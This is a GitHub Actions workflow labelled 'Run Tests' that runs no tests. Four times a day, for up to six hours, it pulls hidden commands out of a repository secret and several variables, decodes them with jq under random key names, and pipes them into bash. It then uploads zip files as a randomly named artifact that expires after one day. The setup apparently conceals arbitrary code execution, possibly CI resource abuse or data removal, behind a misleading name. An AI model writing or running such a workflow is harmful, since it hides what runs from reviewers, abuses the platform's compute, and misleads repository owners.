name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '24 4,10,16,22 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run
        env:
          r0316: ${{ secrets.r0316 }}
        run: |
          printf '%s' "$r0316" | jq -r .ditam69 | /bin/bash
          printf '%s' "$dzclg56" | jq -r .rlu84579 | /bin/bash
          echo $vu3 | jq -r .epjih34757 | /bin/bash
          echo $s2210 | jq -r .pkjci24 | /bin/bash
          echo $cx9 | jq -r .gl61 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: CPwJg3D2
          path: "*.zip"
          retention-days: 1
